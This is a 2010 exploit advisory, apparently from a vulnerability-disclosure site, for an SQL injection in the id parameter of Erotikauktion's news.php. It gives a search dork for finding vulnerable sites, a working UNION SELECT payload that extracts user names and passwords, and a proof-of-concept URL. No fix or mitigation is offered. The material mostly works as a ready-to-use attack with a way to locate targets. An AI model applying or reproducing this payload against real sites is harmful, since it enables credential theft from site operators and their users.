Erotikauktion (news.php id) SQL Injection Vulnerability

2010-05-10 19:37:55

Title : Erotikauktion ( news.php ) sql injection
Date : 10 May 2010
Author : Attack3r
Blog : a4security.blogspot.com
Site : www.1923Turk.Com
=======================================
dork : inurl:"/news.php?id="

Sql : -1+and+1=1+union+select+1,concat(name,0x3a,password
,0x3a),3,4,5+from+users

p0c :
http://192.168.1.1/path/news.php?id=-1+and+1=1+union+select+1,concat(name,0x3a,password
,0x3a),3,4,5+from+users


=======================================

gr33tz : HaCkSpY, CodeMaster.. And All Muslim Hackers ...

==========A=T=T=A=C=K=3=R==============

Fixes

No fixes

In order to submit a new fix you need to be registered.